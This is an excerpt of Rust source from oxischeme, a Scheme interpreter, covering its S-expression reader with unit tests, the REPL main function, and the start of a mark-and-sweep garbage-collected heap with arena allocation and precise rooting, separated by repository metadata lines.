`None`. fn next(&mut self) -> Option<char> { match self.reader.read_char() { Ok(c) => Some(c), Err(ref e) if is_eof(e) => None, Err(e) => panic!("IO ERROR! {}", e), } } } /// Return true if the error is reaching the end of file, false otherwise. fn is_eof(err : &IoError) -> bool { err.kind == IoErrorKind::EndOfFile } /// Return true if the character is the start of a comment, false otherwise. fn is_comment(c: &char) -> bool { *c == ';' } /// Return true if the character is a delimiter between tokens, false otherwise. fn is_delimiter(c: &char) -> bool { c.is_whitespace() || is_comment(c) || *c == ')' || *c == '(' } /// Return true if we have EOF (`None`) or a delimiting character, false /// otherwise. fn is_eof_or_delimiter(oc: &Option<char>) -> bool { match *oc { None => true, Some(ref c) if is_delimiter(c) => true, _ => false, } } fn is_symbol_initial(c: &char) -> bool { c.is_alphabetic() || is_symbol_special_initial(c) || is_symbol_peculiar(c) } fn is_symbol_peculiar(c: &char) -> bool { *c == '+' || *c == '-' || *c == '…' } fn is_symbol_special_initial(c: &char) -> bool { *c == '!' || *c == '$' || *c == '%' || *c == '&' || *c == '*' || *c == '/' || *c == ':' || *c == '<' || *c == '=' || *c == '>' || *c == '?' || *c == '~' || *c == '_' || *c == '^' } fn is_symbol_subsequent(c: &char) -> bool { is_symbol_initial(c) || c.is_digit(10) || *c == '.' || *c == '+' || *c == '-' } /// A source location. #[derive(Debug)] pub struct Location { /// The source file. pub file: String, /// 1-based line number. pub line: u64, /// 1-based column number. pub column: u64 } impl Location { /// Create a new `Location` object. pub fn new(file: String) -> Location { Location { file: file, line: 1, column: 1, } } /// Create a placeholder `Location` object for when the actual location is /// unknown. pub fn unknown() -> Location { let mut loc = Location::new("<unknown source location>".to_string()); loc.line = 0; loc.column = 0; loc } } impl fmt::Display for Location { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}:{}:{}", self.file, self.line, self.column) } } impl Clone for Location { fn clone(&self) -> Self { let mut new_loc = Location::new(self.file.clone()); new_loc.line = self.line; new_loc.column = self.column; new_loc } } /// A pair of `SchemeResult` and `Location`. pub type SchemeResultAndLocation = (Location, SchemeResult); /// `Read` iteratively parses values from the input `Reader`. pub struct Read<R: Reader> { chars: RefCell<Peekable<CharReader<R>>>, current_location: Location, result: Result<(), String>, heap_ptr: *mut Heap, had_error: bool } impl<'a, R: Reader> Read<R> { /// Create a new `Read` instance from the given `Reader` input source. pub fn new(reader: R, heap: *mut Heap, file_name: String) -> Read<R> { Read { chars: RefCell::new(CharReader::new(reader).peekable()), current_location: Location::new(file_name), result: Ok(()), heap_ptr: heap, had_error: false, } } /// Get the current context. fn heap(&'a self) -> &'a mut Heap { unsafe { self.heap_ptr.as_mut() .expect("Read<R> should always have a valid Heap") } } /// Peek at the next character in our input stream. fn peek_char(&self) -> Option<char> { match self.chars.borrow_mut().peek() { None => None, Some(c) => Some(*c) } } /// Take the next character from the input stream. fn next_char(&mut self) -> Option<char> { let opt_c = self.chars.borrow_mut().next(); if let Some(ref c) = opt_c.as_ref() { match **c { '\n' => { self.current_location.line += 1; self.current_location.column = 1; }, _ => self.current_location.column += 1, }; } opt_c } /// Skip to after the next newline character. fn skip_line(&mut self) { loop { match self.peek_char() { None => return, Some('\n') => return, _ => { }, } self.next_char(); } } /// Trim initial whitespace and skip comments. fn trim(&mut self) { loop { let skip_line = match self.peek_char() { Some(c) if c.is_whitespace() => false, Some(c) if is_comment(&c) => true, _ => return, }; if skip_line { self.skip_line(); } else { self.next_char(); } } } /// Get the results of parsing thus far. If there was an error parsing, a /// diagnostic message will be the value of the error. pub fn get_result(&'a self) -> &'a Result<(), String> { &self.result } /// Report a failure reading values. fn report_failure(&mut self, msg: String) -> Option<SchemeResultAndLocation> { self.had_error = true; Some((self.current_location.clone(), Err(format!("{}: {}", self.current_location, msg)))) } /// Report an unexpected character. fn unexpected_character(&mut self, c: &char) -> Option<SchemeResultAndLocation> { self.report_failure(format!("Unexpected character: {}", c)) } /// Expect that the next character is `c` and report a failure if it is /// not. If this ever returns `Some`, then it will always be /// `Some((Location, Err))`. fn expect_character(&mut self, c: char) -> Option<SchemeResultAndLocation> { match self.next_char() { None => { self.report_failure(format!("Expected '{}', but found EOF.", c)) }, Some(d) if d != c => { self.report_failure(format!("Expected '{}', found: '{}'", c, d)) }, _ => None } } /// Report an unexpected EOF. fn unexpected_eof(&mut self) -> Option<SchemeResultAndLocation> { self.report_failure("Unexpected EOF".to_string()) } /// Report a bad character literal, e.g. `#\bad`. fn bad_character_literal(&mut self) -> Option<SchemeResultAndLocation> { self.report_failure("Bad character value".to_string()) } /// Report an unterminated string literal. fn unterminated_string(&mut self) -> Option<SchemeResultAndLocation> { self.report_failure("Unterminated string literal".to_string()) } /// Register the given value as having originated form the given location, /// and wrap it up for returning from the iterator. fn enlocate(&self, location: Location, val: RootedValue) -> Option<SchemeResultAndLocation> { if let Some(pair) = val.to_pair(self.heap()) { self.heap().enlocate(location.clone(), pair); } Some((location, Ok(val))) } /// Given a value, root it and wrap it for returning from the iterator. fn root(&self, loc: Location, val: Value) -> Option<SchemeResultAndLocation> { self.enlocate(loc, Rooted::new(self.heap(), val)) } /// Read a character value, after the starting '#' and '\' characters have /// already been eaten. fn read_character(&mut self, loc: Location) -> Option<SchemeResultAndLocation> { match [self.next_char(), self.peek_char()] { // Normal character, e.g. `#\f`. [Some(c), d] if is_eof_or_delimiter(&d) => { self.root(loc, Value::new_character(c)) }, // Newline character: `#\newline`. [Some('n'), Some('e')] => match [self.next_char(), self.next_char(), self.next_char(), self.next_char(), self.next_char(), self.next_char(), self.peek_char()] { [Some('e'), Some('w'), Some('l'), Some('i'), Some('n'), Some('e'), d] if is_eof_or_delimiter(&d) => { self.root(loc, Value::new_character('\n')) }, _ => self.bad_character_literal(), }, // Space character: `#\space`. [Some('s'), Some('p')] => match [self.next_char(), self.next_char(), self.next_char(), self.next_char(), self.peek_char()] { [Some('p'), Some('a'), Some('c'), Some('e'), d] if is_eof_or_delimiter(&d) => { self.root(loc, Value::new_character(' ')) }, _ => self.bad_character_literal(), }, // Tab character: `#\tab`. [Some('t'), Some('a')] => match [self.next_char(), self.next_char(), self.peek_char()] { [Some('a'), Some('b'), d] if is_eof_or_delimiter(&d) => { self.root(loc, Value::new_character('\t')) }, _ => self.bad_character_literal(), }, _ => self.bad_character_literal(), } } /// Given that we have already peeked a '#' character, read in either a /// boolean or a character. fn read_bool_or_char(&mut self, loc: Location) -> Option<SchemeResultAndLocation> { if let Some(e) = self.expect_character('#') { return Some(e); } // Deterimine if this is a boolean or a character. match [self.next_char(), self.peek_char()] { [Some('t'), d] if is_eof_or_delimiter(&d) => { self.root(loc, Value::new_boolean(true)) }, [Some('f'), d] if is_eof_or_delimiter(&d) => { self.root(loc, Value::new_boolean(false)) }, [Some('\\'), _] => { self.read_character(loc) }, [Some(c), _] => { self.unexpected_character(&c) }, _ => None, } } /// Read an integer. fn read_integer(&mut self, is_negative: bool, loc: Location) -> Option<SchemeResultAndLocation> { let sign : i64 = if is_negative { -1 } else { 1 }; let mut abs_value : i64 = match self.next_char() { None => return self.unexpected_eof(), Some(c) => match c.to_digit(10) { None => return self.unexpected_character(&c), Some(d) => d as i64 } }; loop { match self.peek_char() { None => break, Some(c) if is_delimiter(&c) => break, Some(c) => match c.to_digit(10) { None => return self.unexpected_character(&c), Some(d) => abs_value = (abs_value * 10) + (d as i64), } } self.next_char(); } self.root(loc, Value::new_integer(abs_value * sign)) } /// Read a pair, with the leading '(' already taken from the input. fn read_pair(&mut self, loc: Location) -> Option<SchemeResultAndLocation> { self.trim(); match self.peek_char() { None => return self.unexpected_eof(), Some(')') => { self.next_char(); return self.root(loc, Value::EmptyList); }, _ => { let car = match self.next() { Some((_, Ok(v))) => v, err => return err, }; self.trim(); let next_loc = self.current_location.clone(); match self.peek_char() { None => return self.unexpected_eof(), // Improper list. Some('.') => { self.next_char(); let cdr = match self.next() { Some((_, Ok(v))) => v, err => return err, }; self.trim(); if let Some(e) = self.expect_character(')') { return Some(e); } return self.enlocate(loc, Value::new_pair(self.heap(), &car, &cdr)); }, // Proper list. _ => { let cdr = match self.read_pair(next_loc) { Some((_, Ok(v))) => v, err => return err, }; return self.enlocate(loc, Value::new_pair(self.heap(), &car, &cdr)); }, }; }, }; } /// Read a string in from the input. fn read_string(&mut self, loc: Location) -> Option<SchemeResultAndLocation> { if let Some(e) = self.expect_character('"') { return Some(e); } let mut str = String::new(); loop { match self.next_char() { None => return self.unterminated_string(), Some('"') => return self.enlocate(loc, Value::new_string(self.heap(), str)), Some('\\') => { match self.next_char() { Some('n') => str.push('\n'), Some('t') => str.push('\t'), Some('\\') => str.push('\\'), Some('"') => str.push('"'), Some(c) => return self.unexpected_character(&c), None => return self.unterminated_string(), } }, Some(c) => str.push(c), } } } /// Read a symbol in from the input. Optionally supply a prefix character /// that was already read from the symbol. fn read_symbol(&mut self, prefix: Option<char>, loc: Location) -> Option<SchemeResultAndLocation> { let mut str = String::new(); if prefix.is_some() { str.push(prefix.unwrap()); } else { match self.next_char() { Some(c) if is_symbol_initial(&c) => str.push(c), Some(c) => { return self.unexpected_character(&c); }, None => { return self.unexpected_eof(); }, }; } loop { match self.peek_char() { Some(c) if is_symbol_subsequent(&c) => { self.next_char(); str.push(c) }, _ => break, }; } return self.enlocate(loc, self.heap().get_or_create_symbol(str)); } /// Read a quoted form from input, e.g. `'(1 2 3)`. fn read_quoted(&mut self, loc: Location) -> Option<SchemeResultAndLocation> { if let Some(e) = self.expect_character('\'') { return Some(e); } return match self.next() { Some((_, Ok(val))) => self.enlocate(loc, list(self.heap(), &mut [ self.heap().get_or_create_symbol("quote".to_string()), val ])), err => err }; } } impl<R: Reader> Iterator for Read<R> { type Item = SchemeResultAndLocation; fn next(&mut self) -> Option<SchemeResultAndLocation> { if self.had_error { return None; } self.trim(); let location = self.current_location.clone(); match self.peek_char() { None => None, Some('\'') => self.read_quoted(location), Some('-') => { self.next_char(); match self.peek_char() { Some(c) if c.is_digit(10) => { self.read_integer(true, location) }, _ => self.read_symbol(Some('-'), location), } }, Some(c) if c.is_digit(10) => self.read_integer(false, location), Some('#') => self.read_bool_or_char(location), Some('"') => self.read_string(location), Some('(') => { self.next_char(); self.read_pair(location) }, Some(c) if is_symbol_initial(&c) => self.read_symbol(None, location), Some(c) => self.unexpected_character(&c), } } } /// Create a `Read` instance from a byte vector. pub fn read_from_bytes(bytes: Vec<u8>, heap: *mut Heap, file_name: &str) -> Read<MemReader> { Read::new(MemReader::new(bytes), heap, file_name.to_string()) } /// Create a `Read` instance from a `String`. pub fn read_from_string(string: String, heap: *mut Heap, file_name: &str) -> Read<MemReader> { read_from_bytes(string.into_bytes(), heap, file_name) } /// Create a `Read` instance from a `&str`. pub fn read_from_str(str: &str, heap: *mut Heap, file_name: &str) -> Read<MemReader> { read_from_string(str.to_string(), heap, file_name) } /// Create a `Read` instance from the file at `path_name`. pub fn read_from_file(path_name: &str, heap: *mut Heap) -> IoResult<Read<File>> { let file_name = path_name.clone().to_string(); let path = Path::new(path_name); let file = try!(File::open(&path)); Ok(Read::new(file, heap, file_name)) } // TESTS ----------------------------------------------------------------------- #[cfg(test)] mod tests { use super::*; use heap::{Heap, Rooted}; use value::{Value}; #[test] fn test_read_integers() { let input = "5 -5 789 -987"; let mut heap = Heap::new(); let results : Vec<Value> = read_from_str(input, &mut heap, "test_read_integers") .map(|(_, r)| *r.ok().expect("Should not get a read error")) .collect(); assert_eq!(results, vec!(Value::new_integer(5), Value::new_integer(-5), Value::new_integer(789), Value::new_integer(-987))) } #[test] fn test_read_booleans() { let input = "#t #f"; let mut heap = Heap::new(); let results : Vec<Value> = read_from_str(input, &mut heap, "test_read_booleans") .map(|(_, r)| *r.ok().expect("Should not get a read error")) .collect(); assert_eq!(results, vec!(Value::new_boolean(true), Value::new_boolean(false))) } #[test] fn test_read_characters() { let input = "#\\a #\\0 #\\- #\\space #\\tab #\\newline #\\\n"; let mut heap = Heap::new(); let results : Vec<Value> = read_from_str(input, &mut heap, "test_read_characters") .map(|(_, r)| *r.ok().expect("Should not get a read error")) .collect(); assert_eq!(results, vec!(Value::new_character('a'), Value::new_character('0'), Value::new_character('-'), Value::new_character(' '), Value::new_character('\t'), Value::new_character('\n'), Value::new_character('\n'))); } #[test] fn test_read_comments() { let input = "1 ;; this is a comment\n2"; let mut heap = Heap::new(); let results : Vec<Value> = read_from_str(input, &mut heap, "test_read_comments") .map(|(_, r)| *r.ok().expect("Should not get a read error")) .collect(); assert_eq!(results.len(), 2); assert_eq!(results, vec!(Value::new_integer(1), Value::new_integer(2))); } #[test] fn test_read_pairs() { let input = "() (1 2 3) (1 (2) ((3)))"; let heap = &mut Heap::new(); let results : Vec<Value> = read_from_str(input, heap, "test_read_pairs") .map(|(_, r)| *r.ok().expect("Should not get a read error")) .collect(); assert_eq!(results.len(), 3); assert_eq!(results[0], Value::EmptyList); let v1 = &results[1]; assert_eq!(v1.car(heap).expect("v1.car"), Rooted::new(heap, Value::new_integer(1))); assert_eq!(v1.cdr(heap).expect("v1.cdr") .car(heap).expect("v1.cdr.car"), Rooted::new(heap, Value::new_integer(2))); assert_eq!(v1.cdr(heap).expect("v1.cdr") .cdr(heap).expect("v1.cdr.cdr") .car(heap).expect("v1.cdr.cdr.car"), Rooted::new(heap, Value::new_integer(3))); assert_eq!(v1.cdr(heap).expect("v1.cdr") .cdr(heap).expect("v1.cdr.cdr") .cdr(heap).expect("v1.cdr.cdr.cdr"), Rooted::new(heap, Value::EmptyList)); let v2 = &results[2]; assert_eq!(v2.car(heap).expect("v2.car"), Rooted::new(heap, Value::new_integer(1))); assert_eq!(v2.cdr(heap).expect("v2.cdr") .car(heap).expect("v2.cdr.car") .car(heap).expect("v2.cdr.car.car"), Rooted::new(heap, Value::new_integer(2))); assert_eq!(v2.cdr(heap).expect("v2.cdr") .car(heap).expect("v2.cdr.car") .cdr(heap).expect("v2.cdr.car.cdr"), Rooted::new(heap, Value::EmptyList)); assert_eq!(v2.cdr(heap).expect("v2.cdr") .cdr(heap).expect("v2.cdr.cdr") .car(heap).expect("v2.cdr.cdr.car") .car(heap).expect("v2.cdr.cdr.car.car") .car(heap).expect("v2.cdr.cdr.car.car.car"), Rooted::new(heap, Value::new_integer(3))); assert_eq!(v2.cdr(heap).expect("v2.cdr") .cdr(heap).expect("v2.cdr.cdr") .car(heap).expect("v2.cdr.cdr.car") .car(heap).expect("v2.cdr.cdr.car.car") .cdr(heap).expect("v2.cdr.cdr.car.car.cdr"), Rooted::new(heap, Value::EmptyList)); assert_eq!(v2.cdr(heap).expect("v2.cdr") .cdr(heap).expect("v2.cdr.cdr") .car(heap).expect("v2.cdr.cdr.car") .cdr(heap).expect("v2.cdr.cdr.car.cdr"), Rooted::new(heap, Value::EmptyList)); assert_eq!(v2.cdr(heap).expect("v2.cdr") .cdr(heap).expect("v2.cdr.cdr") .cdr(heap).expect("v2.cdr.cdr.cdr"), Rooted::new(heap, Value::EmptyList)); } #[test] fn test_read_improper_lists() { let input = "(1 . 2) (3 . ()) (4 . (5 . 6)) (1 2 . 3)"; let heap = &mut Heap::new(); let results : Vec<Value> = read_from_str(input, heap, "test_read_improper_lists") .map(|(_, r)| *r.ok().expect("Should not get a read error")) .collect(); assert_eq!(results.len(), 4); let v0 = &results[0]; assert_eq!(v0.car(heap), Some(Rooted::new(heap, Value::new_integer(1)))); assert_eq!(v0.cdr(heap), Some(Rooted::new(heap, Value::new_integer(2)))); let v1 = &results[1]; assert_eq!(v1.car(heap), Some(Rooted::new(heap, Value::new_integer(3)))); assert_eq!(v1.cdr(heap), Some(Rooted::new(heap, Value::EmptyList))); let v2 = &results[2]; assert_eq!(v2.car(heap), Some(Rooted::new(heap, Value::new_integer(4)))); assert_eq!(v2.cdr(heap).expect("v2.cdr") .car(heap), Some(Rooted::new(heap, Value::new_integer(5)))); assert_eq!(v2.cdr(heap).expect("v2.cdr") .cdr(heap), Some(Rooted::new(heap, Value::new_integer(6)))); let v3 = &results[3]; assert_eq!(v3.car(heap), Some(Rooted::new(heap, Value::new_integer(1)))); assert_eq!(v3.cdr(heap).expect("v3.cdr") .car(heap), Some(Rooted::new(heap, Value::new_integer(2)))); assert_eq!(v3.cdr(heap).expect("v3.cdr") .cdr(heap), Some(Rooted::new(heap, Value::new_integer(3)))); } #[test] fn test_read_string() { let input = "\"\" \"hello\" \"\\\"\""; let heap = &mut Heap::new(); let results : Vec<Value> = read_from_str(input, heap, "test_read_string") .map(|(_, r)| *r.ok().expect("Should not get a read error")) .collect(); assert_eq!(results.len(), 3); match results[0] { Value::String(str) => assert_eq!(*str, "".to_string()), _ => assert!(false), } match results[1] { Value::String(str) => assert_eq!(*str, "hello".to_string()), _ => assert!(false), } match results[2] { Value::String(str) => assert_eq!(*str, "\"".to_string()), _ => assert!(false), } } #[test] fn test_read_symbols() { let input = "foo + - * ? !"; let heap = &mut Heap::new(); let results : Vec<Value> = read_from_str(input, heap, "test_read_symbols") .map(|(_, r)| *r.ok().expect("Should not get a read error")) .collect(); assert_eq!(results.len(), 6); match results[0] { Value::Symbol(str) => assert_eq!(*str, "foo".to_string()), _ => assert!(false), } match results[1] { Value::Symbol(str) => assert_eq!(*str, "+".to_string()), _ => assert!(false), } match results[2] { Value::Symbol(str) => assert_eq!(*str, "-".to_string()), _ => assert!(false), } match results[3] { Value::Symbol(str) => assert_eq!(*str, "*".to_string()), _ => assert!(false), } match results[4] { Value::Symbol(str) => assert_eq!(*str, "?".to_string()), _ => assert!(false), } match results[5] { Value::Symbol(str) => assert_eq!(*str, "!".to_string()), _ => assert!(false), } } #[test] fn test_read_same_symbol() { let input = "foo foo"; let heap = &mut Heap::new(); let results : Vec<Value> = read_from_str(input, heap, "test_read_same_symbol") .map(|(_, r)| *r.ok().expect("Should not get a read error")) .collect(); assert_eq!(results.len(), 2); // We should only allocate one StringPtr and share it between both parses of // the same symbol. assert_eq!(results[0], results[1]); } #[test] fn test_read_quoted() { let input = "'foo"; let heap = &mut Heap::new(); let results : Vec<Value> = read_from_str(input, heap, "test_read_quoted") .map(|(_, r)| *r.ok().expect("Should not get a read error")) .collect(); assert_eq!(results.len(), 1); let car = results[0].car(heap).map(|s| *s); match car { Some(Value::Symbol(str)) => assert_eq!(*str, "quote".to_string()), _ => assert!(false), } let cdar = results[0] .cdr(heap).expect("results[0].cdr") .car(heap).map(|s| *s); match cdar { Some(Value::Symbol(str)) => assert_eq!(*str, "foo".to_string()), _ => assert!(false), } } #[test] fn test_read_from_file() { let heap = &mut Heap::new(); let reader = read_from_file("./tests/test_read_from_file.scm", heap) .ok() .expect("Should be able to read from a file"); let results : Vec<Value> = reader .map(|(_, r)| *r.ok().expect("Should not get a read error")) .collect(); assert_eq!(results.len(), 1); assert_eq!(**results[0].to_symbol(heap).expect("Should be a symbol"), "hello".to_string()); } #[test] fn test_read_locations() { // 1 2 // 12345678901234567890 let input = " -1 'quoted \n\ (on a new line) twice"; let heap = &mut Heap::new(); let results : Vec<Location> = read_from_str(input, heap, "test_read_locations") .map(|(loc, _)| loc) .collect(); assert_eq!(results.len(), 4); let file_str = "test_read_locations".to_string(); assert_eq!(results[0].file, file_str); assert_eq!(results[0].line, 1); assert_eq!(results[0].column, 5);
rust
Apache-2.0
fdcf1e9d688aaa02a2ee9c647774f74c7ea08005
2026-01-04T20:20:58.006505Z
true
fitzgen/oxischeme
https://github.com/fitzgen/oxischeme/blob/fdcf1e9d688aaa02a2ee9c647774f74c7ea08005/src/main.rs
src/main.rs
// Copyright 2014 Nick Fitzgerald // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. //! A Scheme implementation, in Rust. #![feature(collections)] #![feature(core)] #![feature(env)] #![feature(old_io)] #![feature(old_path)] #![feature(test)] #![feature(unicode)] #![feature(unsafe_destructor)] use std::old_io; use std::env; pub mod environment; pub mod eval; pub mod heap; pub mod primitives; pub mod read; pub mod value; /// Start a Read -> Evaluate -> Print loop. pub fn repl(heap: &mut heap::Heap) { println!("Welcome to oxischeme!"); println!("C-c to exit."); println!(""); loop { let stdin = old_io::stdio::stdin(); let reader = read::Read::new(stdin, heap, "stdin".to_string()); print!("oxischeme> "); for (location, read_result) in reader { match read_result { Err(msg) => { println!("{}", msg); break; }, Ok(form) => { match eval::evaluate(heap, &form, location) { Ok(val) => println!("{}", *val), Err(e) => println!("{}", e), }; } } heap.collect_garbage(); print!("oxischeme> "); } } } /// Given no arguments, start the REPL. Otherwise, treat each argument as a file /// path and read and evaluate each of them in turn. pub fn main() { let heap = &mut heap::Heap::new(); let mut args_were_passed = false; for file_path in env::args().skip(1) { args_were_passed = true; match eval::evaluate_file(heap, file_path.as_slice()) { Ok(_) => { }, Err(msg) => { let mut stderr = old_io::stdio::stderr(); (write!(&mut stderr, "{}", msg)).ok().expect("IO ERROR!"); return; } } } if !args_were_passed { repl(heap); } }
rust
Apache-2.0
fdcf1e9d688aaa02a2ee9c647774f74c7ea08005
2026-01-04T20:20:58.006505Z
false
fitzgen/oxischeme
https://github.com/fitzgen/oxischeme/blob/fdcf1e9d688aaa02a2ee9c647774f74c7ea08005/src/heap.rs
src/heap.rs
// Copyright 2014 Nick Fitzgerald // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. //! The `heap` module provides memory management for our Scheme implementation. //! //! ## Allocation //! //! Scheme has a variety of types that must be allocated on the heap: cons cells, //! strings, procedures, and vectors (currently unimplemented). //! //! Oxischeme does not allocate each individual object directly from the OS, //! which would have unnecessary bookkeeping overhead. Instead, we allocate //! objects from an "arena" which contains a pre-allocated object pool reserved //! for allocating future objects from. We keep track of an arena's un-used //! objects with a "free list" of indices into this pool. When we allocate a new //! object, we remove the first entry from this list and return a pointer to the //! object at that entry's index in the object pool. Garbage collection adds new //! entries to the free list when reclaiming dead objects. When allocating, if //! our existing arenas' pools are already at capacity (ie, all of their free //! lists are empty), then we allocate another arena from the OS, add it to our //! set of arenas, and allocate from its object pool. During garbage collection, //! if an arena is empty, its memory is returned to the OS. //! //! ## Garbage Collection //! //! Any type that is heap-allocated must be *garbage collected* so that the //! memory of no-longer used instances of that type can be reclaimed for //! reuse. This provides the illusion of infinite memory, and frees Scheme //! programmers from manually managing allocations and frees. We refer to //! GC-managed types as "GC things". Note that a GC thing does not need to be a //! Scheme value type: activations are also managed by the GC, but are not a //! first class Scheme value. //! //! Any structure that has references to a garbage collected type must //! *participate in garbage collection* by telling the garbage collector about //! all of the GC things it is holding alive. Participation is implemented via //! the `Trace` trait. Note that the set of types that participate in garbage //! collection is not the same as the set of all GC things. Some GC things do not //! participate in garbage collection: strings do not hold references to any //! other GC things. //! //! A "GC root" is a GC participant that is always reachable. For example, the //! global activation is a root because global variables must always be //! accessible. //! //! We use a simple *mark and sweep* garbage collection algorithm. In the mark //! phase, we start from the roots and recursively trace every reachable object //! in the heap graph, adding them to our "marked" set. If a GC thing is not //! reachable, then it is impossible for the Scheme program to use it in the //! future, and it is safe for the garbage collector to reclaim it. The //! unreachable objects are the set of GC things that are not in the marked //! set. We find these unreachable objects and return them to their respective //! arena's free list in the sweep phase. //! //! ### Rooting //! //! Sometimes it is necessary to temporarily root GC things referenced by //! pointers on the stack. Garbage collection can be triggered by allocating any //! GC thing, and it isn't always clear which rust functions (or other functions //! called by those functions, or even other functions called by those functions //! called from the first function, and so on) might allocate a GC thing and //! trigger collection. The situation we want to avoid is a rust function using a //! temporary variable that references a GC thing, then calling another function //! which triggers a collection and collects the GC thing that was referred to by //! the temporary variable, and the temporary variable is now a dangling //! pointer. If the rust function accesses it again, that is undefined behavior: //! it might still get the value it was pointing at, or it might be a segfault, //! or it might be a freshly allocated value used by something else! Not good! //! //! Here is what this scenario looks like in psuedo code: //! //! let a = pointer_to_some_gc_thing; //! function_which_can_trigger_gc(); //! // Oops! A collection was triggered and dereferencing this pointer leads //! // to undefined behavior! //! *a; //! //! There are two possible solutions to this problem. The first is *conservative* //! garbage collection, where we walk the stack and if anything on the stack //! looks like it might be a pointer and if coerced to a pointer happens to point //! to a GC thing in the heap, we assume that it *is* a pointer and we consider //! the GC thing that may or may not actually be pointed to by a variable on the //! stack a GC root. The second is *precise rooting*. With precise rooting, it is //! the responsibility of the rust function's author to explicitly root and //! unroot pointers to GC things used in variables on the stack. //! //! Oxischeme uses precise rooting. Precise rooting is implemented with the //! `Rooted<GcThingPtr>` smart pointer type, which roots its referent upon //! construction and unroots it when the smart pointer goes out of scope and is //! dropped. //! //! Using precise rooting and `Rooted`, we can solve the dangling pointer //! problem like this: //! //! { //! // The pointed to GC thing gets rooted when wrapped with `Rooted`. //! let a = Rooted::new(heap, pointer_to_some_gc_thing); //! function_which_can_trigger_gc(); //! // Dereferencing `a` is now safe, because the referent is a GC root! //! *a; //! } //! // `a` goes out of scope, and its referent is unrooted. //! //! Tips for working with precise rooting if your function allocates GC things, //! or calls other functions which allocate GC things: //! //! * Accept GC thing parameters as `&Rooted<T>` or `&mut Rooted<T>` to ensure //! that callers properly root them. //! //! * Accept a `&mut Heap` parameter and return `Rooted<T>` for getters and //! methods that return GC things. This greatly alleviates potential //! foot-guns, as a caller would have to explicitly unwrap the smart pointer //! and store that in a new variable to cause a dangling pointer. It also //! cuts down on `Rooted<T>` construction boiler plate. //! //! * Always root GC things whose lifetime spans a call which could trigger a //! collection! //! //! * When in doubt, Just Root It! use std::cmp; use std::collections::{BitVec, HashMap}; use std::default::{Default}; use std::fmt; use std::ops::{Deref, DerefMut}; use std::vec::{IntoIter}; use environment::{Activation, ActivationPtr, RootedActivationPtr, Environment}; use primitives::{define_primitives}; use read::{Location}; use value::{Cons, ConsPtr, Procedure, ProcedurePtr, RootedConsPtr, RootedProcedurePtr, RootedValue, Value}; /// We use a vector for our implementation of a free list. `Vector::push` to add /// new entries, `Vector::pop` to remove the next entry when we allocate. type FreeList = Vec<usize>; /// An arena from which to allocate `T` objects from. pub struct Arena<T> { pool: Vec<T>, /// The set of free indices into `pool` that are available for allocating an /// object from. free: FreeList, /// During a GC, if the nth bit of `marked` is set, that means that the nth /// object in `pool` has been marked as reachable. marked: BitVec, } impl<T: Default> Arena<T> { /// Create a new `Arena` with the capacity to allocate the given number of /// `T` instances. pub fn new(capacity: usize) -> Box<Arena<T>> { assert!(capacity > 0); Box::new(Arena { pool: range(0, capacity).map(|_| Default::default()).collect(), free: range(0, capacity).collect(), marked: BitVec::from_elem(capacity, false), }) } /// Get this heap's capacity for simultaneously allocated cons cells. pub fn capacity(&self) -> usize { self.pool.len() } /// Return true if this arena is at full capacity, and false otherwise. pub fn is_full(&self) -> bool { self.free.is_empty() } /// Return true if this arena does not contain any reachable objects (ie, /// the free list is full), and false otherwise. pub fn is_empty(&self) -> bool { self.free.len() == self.capacity() } /// Allocate a new `T` instance and return a pointer to it. /// /// ## Panics /// /// Panics when this arena's pool is already at capacity. pub fn allocate(&mut self) -> ArenaPtr<T> { match self.free.pop() { Some(idx) => { let self_ptr : *mut Arena<T> = self; ArenaPtr::new(self_ptr, idx) }, None => panic!("Arena is at capacity!"), } } /// Sweep the arena and add any reclaimed objects back to the free list. pub fn sweep(&mut self) { self.free = range(0, self.capacity()) .filter(|&n| { !self.marked.get(n) .expect("`marked` should always have length == self.capacity()") }) .collect(); // Reset `marked` to all zero. self.marked.set_all(); self.marked.negate(); } } /// A set of `Arena`s. Manages allocating and deallocating additional `Arena`s /// from the OS, depending on the number of objects requested and kept alive by /// the mutator. pub struct ArenaSet<T> { capacity: usize, arenas: Vec<Box<Arena<T>>>, } impl<T: Default> ArenaSet<T> { /// Create a new `ArenaSet`. pub fn new(capacity: usize) -> ArenaSet<T> { ArenaSet { capacity: capacity, arenas: vec!() } } /// Sweep all of the arenas in this set. pub fn sweep(&mut self) { for arena in self.arenas.iter_mut() { arena.sweep(); } // Deallocate any arenas that do not contain any reachable objects. self.arenas.retain(|a| !a.is_empty()); } /// Allocate a `T` object from one of the arenas in this set and return a /// pointer to it. pub fn allocate(&mut self) -> ArenaPtr<T> { for arena in self.arenas.iter_mut() { if !arena.is_full() { return arena.allocate(); } } // All existing arenas are at capacity, allocate a new one for this // requested object allocation, get the requested object from it, and add it to our // set. let mut new_arena = Arena::new(self.capacity); let result = new_arena.allocate(); self.arenas.push(new_arena); result } } /// A pointer to a `T` instance in an arena. #[allow(raw_pointer_derive)] #[derive(Hash)] pub struct ArenaPtr<T> { arena: *mut Arena<T>, index: usize, } // XXX: We have to manually declare that ArenaPtr<T> is copy-able because if we // use `#[derive(Copy)]` it wants T to be copy-able as well, despite the fact // that we only need to copy our pointer to the Arena<T>, not any T or the Arena // itself. impl<T> ::std::marker::Copy for ArenaPtr<T> { } impl<T: Default> ArenaPtr<T> { /// Create a new `ArenaPtr` to the `T` instance at the given index in the /// provided arena. **Not** publicly exposed, and should only be called by /// `Arena::allocate`. fn new(arena: *mut Arena<T>, index: usize) -> ArenaPtr<T> { unsafe { let arena_ref = arena.as_ref() .expect("ArenaPtr<T>::new should be passed a valid Arena."); assert!(index < arena_ref.capacity()); } ArenaPtr { arena: arena, index: index, } } /// During a GC, mark this `ArenaPtr` as reachable. fn mark(&self) { unsafe { let arena = self.arena.as_mut() .expect("An 